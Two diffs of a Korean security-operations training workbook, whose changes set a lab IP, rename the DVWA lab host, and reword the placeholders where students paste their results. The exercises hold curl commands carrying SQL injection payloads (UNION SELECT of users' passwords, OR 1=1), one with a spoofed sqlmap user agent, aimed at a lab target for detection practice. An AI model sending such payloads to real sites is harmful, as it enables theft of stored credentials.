--- a/contents/battle-workbook/soc-w08.docx
+++ b/contents/battle-workbook/soc-w08.docx
@@ -382,7 +382,7 @@
         </w:rPr>
         <w:t>curl -s -A "sqlmap/1.7" -H "Host: dvwa.6v6.lab" \</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  "http://&lt;대상_공개IP&gt;/?id=sa8r1-kim-1%20UNION%20SELECT%20user,password%20FROM%20users"</w:t>
+        <w:t xml:space="preserve">  "http://192.168.0.161/?id=sa8r1-kim-1%20UNION%20SELECT%20user,password%20FROM%20users"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -490,7 +490,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -524,7 +524,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -666,7 +666,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -H "Host: dvwa.6v6.lab" "http://&lt;대상_공개IP&gt;/?id=sa8r1-kim-2%20OR%201=1"</w:t>
+        <w:t>curl -s -H "Host: dvwa.6v6.lab" "http://192.168.0.161/?id=sa8r1-kim-2%20OR%201=1"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -774,7 +774,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -808,7 +808,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1032,7 +1032,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1066,7 +1066,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1300,7 +1300,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1334,7 +1334,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1558,7 +1558,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1592,7 +1592,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1841,7 +1841,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1875,7 +1875,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2109,7 +2109,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2143,7 +2143,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>

--- a/contents/battle-workbook/soc-w08.docx
+++ b/contents/battle-workbook/soc-w08.docx
@@ -380,7 +380,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -A "sqlmap/1.7" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t>curl -s -A "sqlmap/1.7" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/?id=sa8r1-kim-1%20UNION%20SELECT%20user,password%20FROM%20users"</w:t>
       </w:r>
@@ -666,7 +666,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -H "Host: dvwa.6v6.lab" "http://192.168.0.161/?id=sa8r1-kim-2%20OR%201=1"</w:t>
+        <w:t>curl -s -H "Host: dvwa.el34.lab" "http://192.168.0.161/?id=sa8r1-kim-2%20OR%201=1"</w:t>
       </w:r>
     </w:p>
     <w:p>
